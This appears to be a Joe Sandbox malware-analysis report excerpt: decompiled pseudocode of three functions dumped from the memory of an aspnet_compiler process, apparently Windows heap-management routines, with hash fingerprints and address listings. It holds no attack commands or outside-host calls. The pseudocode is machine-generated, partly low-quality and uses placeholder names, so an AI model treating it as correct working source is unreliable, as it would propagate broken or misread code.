                                                  0x01951e10
                                                  0x01951e10
                                                  0x01951e13
                                                  0x01951e16
                                                  0x01951e16
                                                  0x01951e19
                                                  0x01951e1c
                                                  0x01951e1e
                                                  0x01951e20
                                                  0x00000000
                                                  0x00000000
                                                  0x01951e22
                                                  0x01951e24
                                                  0x00000000
                                                  0x01951e26
                                                  0x00000000
                                                  0x01951e26
                                                  0x00000000
                                                  0x01951e24
                                                  0x01951e30
                                                  0x01951e30
                                                  0x00000000
                                                  0x01951e30
                                                  0x01951df5
                                                  0x01951df7
                                                  0x01951e01
                                                  0x01951e32
                                                  0x01951e34
                                                  0x01951e36
                                                  0x00000000
                                                  0x01951e36
                                                  0x01951dc4
                                                  0x01951dc4
                                                  0x00000000
                                                  0x01951dc6
                                                  0x01951dc6
                                                  0x01951dc9
                                                  0x01951dcf
                                                  0x01951dd1
                                                  0x01951e38
                                                  0x01951e38
                                                  0x01951e38
                                                  0x01951e38
                                                  0x01951dc4
                                                  0x01951dbb
                                                  0x01951dbb
                                                  0x01951dbb
                                                  0x01951dbb
                                                  0x01951e3a
                                                  0x01951e3a
                                                  0x01951e3d
                                                  0x01951e40
                                                  0x01951e43
                                                  0x01951e6f
                                                  0x01951fc7
                                                  0x01951fc7
                                                  0x01951e75
                                                  0x01951e75
                                                  0x00000000
                                                  0x01951e75
                                                  0x01951e6f
                                                  0x01951fca
                                                  0x01951fca
                                                  0x01951fce
                                                  0x01951fd0
                                                  0x01951fd0
                                                  0x01951fd3
                                                  0x01951fd9
                                                  0x01951fde
                                                  0x01951fe4
                                                  0x01951fe4
                                                  0x01951fee
                                                  0x01951fee

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f8027b5ec83e59571eea55a89bcc4eeedf80c2d923cb95d1e6ea26e1712d9603
                                                  • Instruction ID: 99dd457dd428c81414f1c61c4a58bf1cac271adf70023d6825a849fde13dcec5
                                                  • Opcode Fuzzy Hash: f8027b5ec83e59571eea55a89bcc4eeedf80c2d923cb95d1e6ea26e1712d9603
                                                  • Instruction Fuzzy Hash: 02815C31E04219CFDF58DFA8C880AECBBB5FF59315B144269E81ABB385DB31A945CB50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 019403DA Relevance: .2, Instructions: 218COMMONCrypto
                                                  Download Yara Rule
                                                  C-Code - Quality: 73%
                                                  			E019403DA(signed int* __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int* _v20;
				signed int _v24;
				signed char _v28;
				signed int _v32;
				signed int* _v36;
				void* __ebx;
				void* __edi;
				intOrPtr* _t80;
				signed int _t87;
				signed char _t90;
				signed int _t107;
				intOrPtr* _t119;
				signed int _t120;
				signed int _t121;
				signed char _t127;
				void* _t129;
				intOrPtr* _t130;
				signed int _t137;
				signed int _t139;
				signed int _t141;
				signed int _t144;
				signed char _t148;
				signed int _t154;
				signed char _t155;
				signed int _t164;
				unsigned int _t167;
				signed int _t168;
				signed int _t170;
				unsigned int _t173;
				signed int* _t174;
				signed int _t175;
				intOrPtr* _t177;
				signed int _t178;
				signed int _t179;
				signed int _t180;
				signed char _t183;
				intOrPtr _t184;
				unsigned int _t186;
				unsigned int _t187;

				_push( *0x197634c);
				_t119 = __ecx;
				_t184 = __edx;
				_push( *0x1976348);
				_v20 = __ecx;
				_push(0);
				_t129 = 0xc;
				_t80 = E0194BBBB(_t129, _t129);
				_t130 = _t80;
				_v16 = _t130;
				if(_t130 == 0) {
					return _t80;
				}
				 *((intOrPtr*)(_t130 + 8)) = _a4;
				_t82 =  &(__ecx[1]);
				 *((intOrPtr*)(_t130 + 4)) = _t184;
				_v36 =  &(__ecx[1]);
				E018A2280( &(__ecx[1]), _t82);
				_v12 = 1;
				 *_t119 =  *((intOrPtr*)( *[fs:0x18] + 0x24));
				_t120 = _t119 + 8;
				_t175 =  *(_t120 + 4);
				_t87 = _t175 >> 5;
				if( *_t120 < _t87 + _t87) {
					L22:
					_t186 = _t175 >> 5;
					_t177 = _v16;
					_t90 = (_t87 | 0xffffffff) << (_t175 & 0x0000001f) &  *(_t177 + 4);
					_v8 = _t90;
					_t137 =  *(_t120 + 8);
					_v8 = (_v8 >> 0x18) + ((_v8 >> 0x00000010 & 0x000000ff) + ((_t90 >> 0x00000008 & 0x000000ff) + ((_t90 & 0x000000ff) + 0xb15dcb) * 0x25) * 0x25) * 0x25;
					_t67 = _t186 - 1; // 0xffffffdf
					_t164 = _t67 & _v8;
					 *_t177 =  *((intOrPtr*)(_t137 + _t164 * 4));
					 *((intOrPtr*)(_t137 + _t164 * 4)) = _t177;
					 *_t120 =  *_t120 + 1;
					_t178 = 0;
					L23:
					 *_v20 =  *_v20 & 0x00000000;
					L0189FFB0(_t120, _t178, _v36);
					if(_t178 != 0) {
						L0194BCD2(_t178,  *0x1976348,  *0x197634c);
					}
					return _v12;
				}
				_t139 = 2;
				_t87 = E018BF3D5( &_v8, _t87 * _t139, _t87 * _t139 >> 0x20);
				if(_t87 < 0) {
					goto L22;
				}
				_t187 = _v8;
				if(_t187 < 4) {
					_t187 = 4;
				}
				_push(0);
				_t87 = E01940150(_t187 << 2);
				_t179 = _t87;
				_v8 = _t179;
				if(_t179 == 0) {
					_t175 =  *(_t120 + 4);
					if(_t175 >= 0x20) {
						goto L22;
					}
					_v12 = _v12 & 0x00000000;
					_t178 = _v16;
					goto L23;
				} else {
					_t19 = _t187 - 1; // 0x3
					_t141 = _t19;
					if((_t187 & _t141) == 0) {
						L10:
						if(_t187 > 0x4000000) {
							_t187 = 0x4000000;
						}
						_v28 = _v28 & 0x00000000;
						_t167 = _t187 << 2;
						_t107 = _t120 | 0x00000001;
						_v24 = _t179;
						_t168 = _t167 >> 2;
						asm("sbb ecx, ecx");
						_t144 =  !(_t167 + _t179) & _t168;
						if(_t144 <= 0) {
							L15:
							_t180 = 0;
							_t170 = (_t168 | 0xffffffff) << ( *(_t120 + 4) & 0x0000001f);
							_v24 = _t170;
							if(( *(_t120 + 4) & 0xffffffe0) <= 0) {
								L20:
								_t147 =  *(_t120 + 8);
								_t87 = _v8;
								_t175 =  *(_t120 + 4) & 0x0000001f | _t187 << 0x00000005;
								 *(_t120 + 8) = _t87;
								 *(_t120 + 4) = _t175;
								if( *(_t120 + 8) != 0) {
									_push(0);
									_t87 = E01940180(_t147);
									_t175 =  *(_t120 + 4);
								}
								goto L22;
							} else {
								goto L16;
							}
							do {
								L16:
								_t121 =  *(_t120 + 8);
								_v32 = _t121;
								while(1) {
									_t148 =  *(_t121 + _t180 * 4);
									_v28 = _t148;
									if((_t148 & 0x00000001) != 0) {
										goto L19;
									}
									 *(_t121 + _t180 * 4) =  *_t148;
									_t124 =  *(_t148 + 4) & _t170;
									_t173 = _v8;
									_t154 = _t187 - 0x00000001 & (( *(_t148 + 4) & _t170) >> 0x00000018) + ((( *(_t148 + 4) & _t170) >> 0x00000010 & 0x000000ff) + ((_t124 >> 0x00000008 & 0x000000ff) + ((_t124 & 0x000000ff) + 0x00b15dcb) * 0x00000025) * 0x00000025) * 0x00000025;
									_t127 = _v28;
									 *_t127 =  *(_t173 + _t154 * 4);
									 *(_t173 + _t154 * 4) = _t127;
									_t170 = _v24;
									_t121 = _v32;
								}
								L19:
								_t180 = _t180 + 1;
								_t120 =  &(_v20[2]);
							} while (_t180 <  *(_t120 + 4) >> 5);
							goto L20;
						} else {
							_t174 = _t179;
							_t183 = _v28;
							do {
								_t183 = _t183 + 1;
								 *_t174 = _t107;
								_t174 =  &(_t174[1]);
							} while (_t183 < _t144);
							goto L15;
						}
					}
					_t155 = _t141 | 0xffffffff;
					if(_t187 == 0) {
						L9:
						_t187 = 1 << _t155;
						goto L10;
					} else {
						goto L8;
					}
					do {
						L8:
						_t155 = _t155 + 1;
						_t187 = _t187 >> 1;
					} while (_t187 != 0);
					goto L9;
				}
			}













































                                                  0x019403e5
                                                  0x019403eb
                                                  0x019403ed
                                                  0x019403ef
                                                  0x019403f5
                                                  0x019403f8
                                                  0x019403fc
                                                  0x019403ff
                                                  0x01940404
                                                  0x01940406
                                                  0x0194040b
                                                  0x01940619
                                                  0x01940619
                                                  0x01940414
                                                  0x01940417
                                                  0x0194041b
                                                  0x0194041e
                                                  0x01940421
                                                  0x0194042c
                                                  0x01940436
                                                  0x01940438
                                                  0x0194043b
                                                  0x01940440
                                                  0x01940448
                                                  0x0194058e
                                                  0x01940596
                                                  0x0194059b
                                                  0x019405a0
                                                  0x019405a3
                                                  0x019405d1
                                                  0x019405d6
                                                  0x019405d9
                                                  0x019405dc
                                                  0x019405e2
                                                  0x019405e4
                                                  0x019405e7
                                                  0x019405e9
                                                  0x019405eb
                                                  0x019405f1
                                                  0x019405f4
                                                  0x019405fb
                                                  0x0194060b
                                                  0x0194060b
                                                  0x00000000
                                                  0x01940610
                                                  0x01940450
                                                  0x01940458
                                                  0x0194045f
                                                  0x00000000
                                                  0x00000000
                                                  0x01940465
                                                  0x0194046b
                                                  0x0194046f
                                                  0x0194046f
                                                  0x01940472
                                                  0x01940478
                                                  0x0194047d
                                                  0x0194047f
                                                  0x01940484
                                                  0x0194061c
                                                  0x01940622
                                                  0x00000000
                                                  0x00000000
                                                  0x01940628
                                                  0x0194062c
                                                  0x00000000
                                                  0x0194048a
                                                  0x0194048a
                                                  0x0194048a
                                                  0x0194048f
                                                  0x019404a2
                                                  0x019404a9
                                                  0x019404ab
                                                  0x019404ab
                                                  0x019404ad
                                                  0x019404b3
                                                  0x019404b8
                                                  0x019404bb
                                                  0x019404c1
                                                  0x019404c6
                                                  0x019404ca
                                                  0x019404cc
                                                  0x019404dd
                                                  0x019404e6
                                                  0x019404e8
                                                  0x019404f1
                                                  0x019404f4
                                                  0x01940568
                                                  0x0194056b
                                                  0x01940571
                                                  0x01940577
                                                  0x01940579
                                                  0x0194057c
                                                  0x01940581
                                                  0x01940583
                                                  0x01940586
                                                  0x0194058b
                                                  0x0194058b
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x019404f6
                                                  0x019404f6
                                                  0x019404f6
                                                  0x019404f9
                                                  0x019404fc
                                                  0x019404fc
                                                  0x019404ff
                                                  0x01940505
                                                  0x00000000
                                                  0x00000000
                                                  0x01940509
                                                  0x0194050f
                                                  0x01940532
                                                  0x01940542
                                                  0x01940544
                                                  0x0194054a
                                                  0x0194054c
                                                  0x0194054f
                                                  0x01940552
                                                  0x01940552
                                                  0x01940557
                                                  0x0194055a
                                                  0x0194055b
                                                  0x01940564
                                                  0x00000000
                                                  0x019404ce
                                                  0x019404ce
                                                  0x019404d0
                                                  0x019404d3
                                                  0x019404d3
                                                  0x019404d4
                                                  0x019404d6
                                                  0x019404d9
                                                  0x00000000
                                                  0x019404d3
                                                  0x019404cc
                                                  0x01940491
                                                  0x01940496
                                                  0x0194049d
                                                  0x019404a0
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x01940498
                                                  0x01940498
                                                  0x01940498
                                                  0x01940499
                                                  0x01940499
                                                  0x00000000
                                                  0x01940498

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 382c874a29227e57993656265a7b9542024879a89ff52d06f71b958f4da69e40
                                                  • Instruction ID: 9e4cccd126ae865dc7d57eb223c201b701ff18b7210becd329e4cfd6a5a09b74
                                                  • Opcode Fuzzy Hash: 382c874a29227e57993656265a7b9542024879a89ff52d06f71b958f4da69e40
                                                  • Instruction Fuzzy Hash: 4A71C572A002159BDB18CF5DC8C1BADBBF6EF88311F198269E9199F385D730E941CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0193FA2B Relevance: .2, Instructions: 214COMMONCrypto
                                                  Download Yara Rule
                                                  C-Code - Quality: 25%
                                                  			E0193FA2B(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t98;
				signed char _t106;
				intOrPtr _t107;
				signed char _t114;
				signed short _t116;
				signed short _t117;
				signed short _t121;
				signed short _t123;
				signed int* _t127;
				signed int _t128;
				signed int _t130;
				signed short _t134;
				void* _t135;
				signed int* _t136;
				void* _t138;
				signed int _t148;
				signed int _t154;
				signed int _t156;
				signed int _t157;
				intOrPtr _t163;
				intOrPtr _t168;
				void* _t169;
				intOrPtr _t171;

				_t157 = __edx;
				_push(0x2c);
				_push(0x1960e38);
				_t98 = E018DD08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t169 - 0x34)) = __edx;
				_t168 = __ecx;
				 *((intOrPtr*)(_t169 - 0x38)) = __ecx;
				 *((intOrPtr*)(_t169 - 0x20)) = 0;
				 *((intOrPtr*)(_t169 - 0x1c)) = 0;
				_t171 =  *0x1977bc8; // 0x0
				if(_t171 == 0) {
					 *((intOrPtr*)(_t169 - 4)) = 0;
					_t148 =  *__edx;
					 *(_t169 - 0x2c) = _t148 & 0x0000ffff;
					 *(_t169 - 0x28) = _t148 >> 0x18;
					 *(_t169 - 0x24) = _t148 >> 8;
					_t106 = _t148 >> 0x10;
					if(( *(__ecx + 0x4c) & _t148) == 0) {
						 *((intOrPtr*)(_t169 - 0x1c)) = 0xa;
						if(( *(__ecx + 0x40) & 0x04000000) != 0 ||  *(_t169 - 0x28) == (_t106 ^ _t148 ^  *(_t169 - 0x24))) {
							_t148 =  *(_t169 - 0x2c) & 0x0000ffff;
							 *((intOrPtr*)(_t169 - 0x1c)) = 1;
							_t114 =  *((intOrPtr*)(_t157 + 6));
							if(_t114 == 0) {
								_t163 = _t168;
							} else {
								_t163 = (1 - (_t114 & 0x000000ff) << 0x10) + (_t157 & 0xffff0000);
							}
							 *((intOrPtr*)(_t169 - 0x20)) = _t163;
							_t116 = _t148 & 0x0000ffff;
							if( *((intOrPtr*)(_t163 + 8)) == 0xffeeffee) {
								_t148 =  *((intOrPtr*)(_t157 + 7));
								if(_t148 == 4) {
									L12:
									_t117 = _t116 & 0x0000ffff;
									 *(_t169 - 0x2c) = _t117;
									 *((intOrPtr*)(_t169 - 0x1c)) = 3;
									if(_t148 != 3) {
										 *((intOrPtr*)(_t169 - 0x1c)) = 6;
										_t148 =  *(_t168 + 0x54) & 0x0000ffff;
										 *(_t169 - 0x24) = _t148;
										_push(0);
										_pop(0);
										if(( *(_t157 + 4 + (_t117 & 0x0000ffff) * 8) ^ _t148) ==  *(_t169 - 0x2c)) {
											_t121 = _t148;
											goto L23;
										}
									} else {
										_t30 = _t157 + 8; // 0x8
										_t148 = _t30;
										_t130 =  *(_t148 + 0x10);
										if((_t130 & 0x00000fff) == 0 && _t130 >=  *((intOrPtr*)(_t163 + 0x1c)) &&  *((intOrPtr*)(_t148 + 0x14)) +  *(_t148 + 0x10) <=  *((intOrPtr*)(_t163 + 0x28))) {
											 *((intOrPtr*)(_t169 - 0x1c)) = 4;
											_t148 =  *_t148;
											_t134 =  *( *(_t157 + 0xc));
											 *(_t169 - 0x2c) = _t134;
											if(_t134 ==  *((intOrPtr*)(_t148 + 4))) {
												_t42 = _t157 + 8; // 0x8
												_t135 = _t42;
												if( *(_t169 - 0x2c) == _t135) {
													 *((intOrPtr*)(_t169 - 0x1c)) = 5;
													_t136 = _t135 + 8;
													 *(_t169 - 0x2c) = _t136;
													_t148 =  *_t136;
													_t138 =  *(_t136[1]);
													if(_t138 ==  *((intOrPtr*)(_t148 + 4)) && _t138 ==  *(_t169 - 0x2c)) {
														_t121 =  *(_t168 + 0x54) & 0x0000ffff;
														 *(_t169 - 0x24) = _t121;
														L23:
														 *((intOrPtr*)(_t169 - 0x1c)) = 7;
														_t148 =  *(_t157 + 4) & 0x0000ffff;
														if(_t121 == _t148) {
															L31:
															 *((intOrPtr*)(_t169 - 0x1c)) = 8;
															if(( *(_t157 + 2) & 0x00000001) != 0) {
																L34:
																 *((intOrPtr*)(_t169 - 0x1c)) = 9;
															} else {
																_t148 =  *(_t157 + 8);
																_t123 =  *( *(_t157 + 0xc));
																 *(_t169 - 0x2c) = _t123;
																if(_t123 ==  *((intOrPtr*)(_t148 + 4)) &&  *(_t169 - 0x2c) == _t157 + 8) {
																	goto L34;
																}
															}
														} else {
															_t127 = _t157 - ((_t148 ^ _t121 & 0x0000ffff) << 3);
															if( *(_t168 + 0x4c) == 0) {
																_t128 =  *_t127;
																_t154 =  *(_t169 - 0x24) & 0x0000ffff;
															} else {
																_t156 =  *_t127;
																 *(_t169 - 0x30) = _t156;
																if(( *(_t168 + 0x4c) & _t156) == 0) {
																	_t128 = _t156;
																} else {
																	_t128 =  *(_t168 + 0x50) ^ _t156;
																	 *(_t169 - 0x30) = _t128;
																}
																_t154 =  *(_t168 + 0x54) & 0x0000ffff;
															}
															 *(_t169 - 0x24) = _t154;
															_t148 =  *(_t157 + 4) & 0x0000ffff ^  *(_t169 - 0x24);
															if(_t128 == _t148) {
																goto L31;
															}
														}
													}
												}
											}
										}
									}
								} else {
									 *((intOrPtr*)(_t169 - 0x1c)) = 2;
									if(_t157 >=  *((intOrPtr*)(_t163 + 0x1c)) && _t157 <  *((intOrPtr*)(_t163 + 0x28)) &&  *((intOrPtr*)(_t163 + 0x18)) == _t168) {
										goto L12;
									}
								}
							}
						}
					}
					 *((intOrPtr*)(_t169 - 4)) = 0xfffffffe;
					if( *(_t168 + 0x4c) != 0) {
						 *(_t157 + 3) =  *(_t157 + 2) ^  *(_t157 + 1) ^  *_t157;
						 *_t157 =  *_t157 ^  *(_t168 + 0x50);
					}
					_t107 =  *((intOrPtr*)(_t169 - 0x1c));
					if(_t107 > 0xa) {
						L45:
						_push(_t148);
						_push(0);
						_push( *((intOrPtr*)(_t169 - 0x1c)));
						_push(_t157);
						_push(2);
						goto L46;
					} else {
						switch( *((intOrPtr*)(( *(_t107 + 0x193fcfb) & 0x000000ff) * 4 +  &M0193FCE3))) {
							case 0:
								_push(_t148);
								_push(0);
								_push( *((intOrPtr*)(_t169 - 0x1c)));
								_push(_t157);
								_push(3);
								goto L46;
							case 1:
								_push(__ecx);
								_push(__ebx);
								_push( *((intOrPtr*)(__edi + 0x18)));
								_push(__edx);
								_push(0xc);
								goto L46;
							case 2:
								_push(__ecx);
								_push(__ebx);
								_push(3);
								_push(__edx);
								__ecx = 0;
								goto L47;
							case 3:
								_push(__ecx);
								_push(__ebx);
								_push( *((intOrPtr*)(__ebp - 0x1c)));
								_push(__edx);
								_push(0xe);
								goto L46;
							case 4:
								_push(__ecx);
								_push(__ebx);
								_push(8);
								_push(__edx);
								_push(0xd);
								L46:
								goto L47;
							case 5:
								goto L45;
						}
					}
					L47:
					_t98 = E0194A80D(_t168);
				}
				return E018DD0D1(_t98);
			}


























                                                  0x0193fa2b
                                                  0x0193fa2b
                                                  0x0193fa2d
                                                  0x0193fa32
                                                  0x0193fa37
                                                  0x0193fa3a
                                                  0x0193fa3c
                                                  0x0193fa43
                                                  0x0193fa46
                                                  0x0193fa49
                                                  0x0193fa4f
                                                  0x0193fa55
                                                  0x0193fa58
                                                  0x0193fa5d
                                                  0x0193fa65
                                                  0x0193fa6d
                                                  0x0193fa72
                                                  0x0193fa78
                                                  0x0193fa7e
                                                  0x0193fa8c
                                                  0x0193faa2
                                                  0x0193faa7
                                                  0x0193faaa
                                                  0x0193faaf
                                                  0x0193fac4
                                                  0x0193fab1
                                                  0x0193fac0
                                                  0x0193fac0
                                                  0x0193fac8
                                                  0x0193facb
                                                  0x0193fad5
                                                  0x0193fadb
                                                  0x0193fae1
                                                  0x0193fb05
                                                  0x0193fb05
                                                  0x0193fb08
                                                  0x0193fb0b
                                                  0x0193fb15
                                                  0x0193fb98
                                                  0x0193fb9f
                                                  0x0193fba5
                                                  0x0193fbb4
                                                  0x0193fbb6
                                                  0x0193fbb7
                                                  0x0193fbbd
                                                  0x00000000
                                                  0x0193fbbd
                                                  0x0193fb17
                                                  0x0193fb17
                                                  0x0193fb17
                                                  0x0193fb1a
                                                  0x0193fb22
                                                  0x0193fb40
                                                  0x0193fb47
                                                  0x0193fb4c
                                                  0x0193fb4e
                                                  0x0193fb54
                                                  0x0193fb5a
                                                  0x0193fb5a
                                                  0x0193fb60
                                                  0x0193fb66
                                                  0x0193fb6d
                                                  0x0193fb70
                                                  0x0193fb73
                                                  0x0193fb78
                                                  0x0193fb7d
                                                  0x0193fb8c
                                                  0x0193fb90
                                                  0x0193fbbf
                                                  0x0193fbbf
                                                  0x0193fbc6
                                                  0x0193fbcd
                                                  0x0193fc18
                                                  0x0193fc18
                                                  0x0193fc23
                                                  0x0193fc3d
                                                  0x0193fc3d
                                                  0x0193fc25
                                                  0x0193fc25
                                                  0x0193fc2b
                                                  0x0193fc2d
                                                  0x0193fc33
                                                  0x00000000
                                                  0x00000000
                                                  0x0193fc33
                                                  0x0193fbcf
                                                  0x0193fbd9
                                                  0x0193fbdf
                                                  0x0193fc00
                                                  0x0193fc06
                                                  0x0193fbe1
                                                  0x0193fbe1
                                                  0x0193fbe3
                                                  0x0193fbe9
                                                  0x0193fbf5
                                                  0x0193fbeb
                                                  0x0193fbee
                                                  0x0193fbf0
                                                  0x0193fbf0
                                                  0x0193fbf7
                                                  0x0193fbfb
                                                  0x0193fc09
                                                  0x0193fc10
                                                  0x0193fc16
                                                  0x00000000
                                                  0x00000000
                                                  0x0193fc16
                                                  0x0193fbcd
                                                  0x0193fb7d
                                                  0x0193fb60
                                                  0x0193fb54
                                                  0x0193fb22
                                                  0x0193fae3
                                                  0x0193fae3
                                                  0x0193faed
                                                  0x00000000
                                                  0x00000000
                                                  0x0193faed
                                                  0x0193fae1
                                                  0x0193fad5
                                                  0x0193fa8c
                                                  0x0193fc44
                                                  0x0193fc72
                                                  0x0193fc7c
                                                  0x0193fc82
                                                  0x0193fc82
                                                  0x0193fc84
                                                  0x0193fc8a
                                                  0x0193fcca
                                                  0x0193fcca
                                                  0x0193fccb
                                                  0x0193fccc
                                                  0x0193fccf
                                                  0x0193fcd0
                                                  0x00000000
                                                  0x0193fc8c
                                                  0x0193fc93
                                                  0x00000000
                                                  0x0193fc9a
                                                  0x0193fc9b
                                                  0x0193fc9c
                                                  0x0193fc9f
                                                  0x0193fca0
                                                  0x00000000
                                                  0x00000000
                                                  0x0193fca4
                                                  0x0193fca5
                                                  0x0193fca6
                                                  0x0193fca9
                                                  0x0193fcaa
                                                  0x00000000
                                                  0x00000000
                                                  0x0193fcae
                                                  0x0193fcaf
                                                  0x0193fcb0
                                                  0x0193fcb2
                                                  0x0193fcb3
                                                  0x00000000
                                                  0x00000000
                                                  0x0193fcb7
                                                  0x0193fcb8
                                                  0x0193fcb9
                                                  0x0193fcbc
                                                  0x0193fcbd
                                                  0x00000000
                                                  0x00000000
                                                  0x0193fcc1
                                                  0x0193fcc2
                                                  0x0193fcc3
                                                  0x0193fcc5
                                                  0x0193fcc6
                                                  0x0193fcd2
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0193fc93
                                                  0x0193fcd3
                                                  0x0193fcd5
                                                  0x0193fcd5
                                                  0x0193fcdf

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 91fb6053202d1441be4e28e8ca2f491361f56ddb0a2494633e995806bdccac55
                                                  • Instruction ID: 090d7fb5d30f2ffb53cafc4145ffacb9d01d439108f2b4ab7c9243853bc9cb4a
                                                  • Opcode Fuzzy Hash: 91fb6053202d1441be4e28e8ca2f491361f56ddb0a2494633e995806bdccac55
                                                  • Instruction Fuzzy Hash: 3F819DB0D402469FDB19CF59C480ABAFBF5FB88305F14815AE949EB681D3749881CF65
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0194DBD2 Relevance: .2, Instructions: 212COMMONCrypto
                                                  Download Yara Rule
                                                  C-Code - Quality: 93%
                                                  			E0194DBD2(intOrPtr* __ecx, unsigned int __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v5;
				signed short _v12;
				unsigned int _v16;
				intOrPtr* _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				signed short _v40;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int* _t75;
				signed short _t77;
				intOrPtr _t78;
				signed int _t92;
				signed int _t98;
				signed int _t99;
				signed short _t105;
				unsigned int _t108;
				void* _t112;
				unsigned int _t119;
				signed int _t124;
				intOrPtr _t137;
				signed char _t139;
				signed int _t140;
				unsigned int _t141;
				signed char _t142;
				intOrPtr _t152;
				signed int _t153;
				signed int _t158;
				signed int _t159;
				intOrPtr _t172;
				signed int _t176;
				signed int _t178;
				signed short _t182;
				intOrPtr _t183;

				_t119 = __edx;
				_v20 = __ecx;
				_t152 = _a4;
				_t172 = 0;
				_t182 = __edx >> 0x0000000c ^  *(__edx + 0x18) ^  *0x1976114;
				_v16 = __edx;
				_v36 = 0;
				_v5 = 0xff;
				_v40 = _t182;
				_v24 = _t182 >> 0x10;
				if(_t152 == 0) {
					L14:
					_t124 =  *(_t119 + 0x12) & 0x0000ffff;
					_v24 = _t124;
					_t183 = _v36;
					_t53 = _t119 + 0x10; // 0x10
					_t75 = _t53;
					_v28 = _t75;
					_t77 =  *_t75 & 0x0000ffff;
					_v12 = _t77;
					L15:
					while(1) {
						if(_t183 != 0) {
							L20:
							_t153 = _t77 + 0x00000001 & 0x0000ffff;
							asm("lock cmpxchg [ebx], cx");
							_t119 = _v16;
							_t77 = _t77 & 0x0000ffff;
							_v12 = _t77;
							if(_t153 == (_t77 & 0x0000ffff) + 1) {
								if(_t77 == 0) {
									_t78 = _t172;
									L27:
									_t119 = L0194D016(_t119, _t183, _t119, _t78);
									L0189FFB0(_t119, _t172, _t183 + 8);
									_t183 = _t172;
									if(_t119 != 0) {
										E0194C52D(_v20,  *((intOrPtr*)(_v20 + 0x78 + ( *(((_v40 & 0x0000ffff) + 7 >> 3) + 0x186aff8) & 0x000000ff) * 4)), _t119, _a8);
									}
									L29:
									_t172 = 1;
									if(_t183 != 0) {
										_t72 = _t183 + 8; // 0x8
										L0189FFB0(_t119, 1, _t72);
									}
									L31:
									return _t172;
								}
								if((_t77 & 0x0000ffff) != _v24 - 1) {
									goto L29;
								}
								_t78 = 2;
								goto L27;
							}
							_t124 = _v24;
							continue;
						}
						if(_t77 == 0 || (_t77 & 0x0000ffff) == _t124 - 1) {
							_t183 = E0194E018(_t119,  &_v5);
							if(_t183 == 0) {
								_t172 = 1;
								goto L31;
							}
							goto L19;
						} else {
							L19:
							_t77 = _v12;
							goto L20;
						}
					}
				}
				_t92 = _t182 & 0x0000ffff;
				_v28 = _t92;
				_t137 =  *((intOrPtr*)(__ecx + 0x78 + ( *((_t92 + 7 >> 3) + 0x186aff8) & 0x000000ff) * 4));
				_t98 =  *((intOrPtr*)(_t137 + 0x24));
				_t158 = _t152 - (_v24 & 0x0000ffff) - __edx;
				_v24 = _t98;
				_t99 = _t158;
				_v32 = _t158;
				_t139 =  *(_t137 + 0x28) & 0x000000ff;
				if(_t98 == 0) {
					_v12 = _t99 >> _t139;
					_t159 = _t158 & (1 << _t139) - 0x00000001;
					_t105 = _v12;
				} else {
					_t105 = E018CD340(_t99 * _v24, _t139, _t99 * _v24 >> 0x20);
					_v12 = _t105;
					_t159 = _v32 - _v28 * _t105;
				}
				if(_t159 == 0) {
					_t140 =  *(_t119 + 0x14) & 0x0000ffff;
					if(_t140 >= _t105) {
						_t140 = _t105 & 0x0000ffff;
					}
					 *(_t119 + 0x14) = _t140;
					_t141 = _t105 + _t105;
					_t142 = _t141 & 0x0000001f;
					_t176 = 3;
					_t178 =  !(_t176 << _t142);
					_t108 =  *(_t119 + (_t141 >> 5) * 4 + 0x20);
					do {
						asm("lock cmpxchg [ebx], edx");
					} while ((_t108 & _t178) != 0);
					if((_t108 >> _t142 & 0x00000001) != 0) {
						_t119 = _v16;
						_t172 = 0;
						if( *((char*)(_t119 + 0x1d)) > 1) {
							_t112 = E0194D864(_t119, _a4 - _t119, _t182 & 0x0000ffff, 0,  &_v32);
							_t184 = _t112;
							if(_t112 != 0xffffffff) {
								asm("lock xadd [ecx], edx");
								E0194D8DF(_v20, _t119, _t184, 2, _a8);
							}
						}
						goto L14;
					}
					_push(_t142);
					_push(_v12);
					E0194A80D( *_v20, 0x11, _a4, _v16);
					_t172 = 0;
				}
			}








































                                                  0x0194dbdc
                                                  0x0194dbde
                                                  0x0194dbe1
                                                  0x0194dbed
                                                  0x0194dbef
                                                  0x0194dbf7
                                                  0x0194dbfd
                                                  0x0194dc00
                                                  0x0194dc04
                                                  0x0194dc07
                                                  0x0194dc0c
                                                  0x0194dd1f
                                                  0x0194dd1f
                                                  0x0194dd23
                                                  0x0194dd26
                                                  0x0194dd29
                                                  0x0194dd29
                                                  0x0194dd2c
                                                  0x0194dd32
                                                  0x0194dd35
                                                  0x00000000
                                                  0x0194dd38
                                                  0x0194dd3a
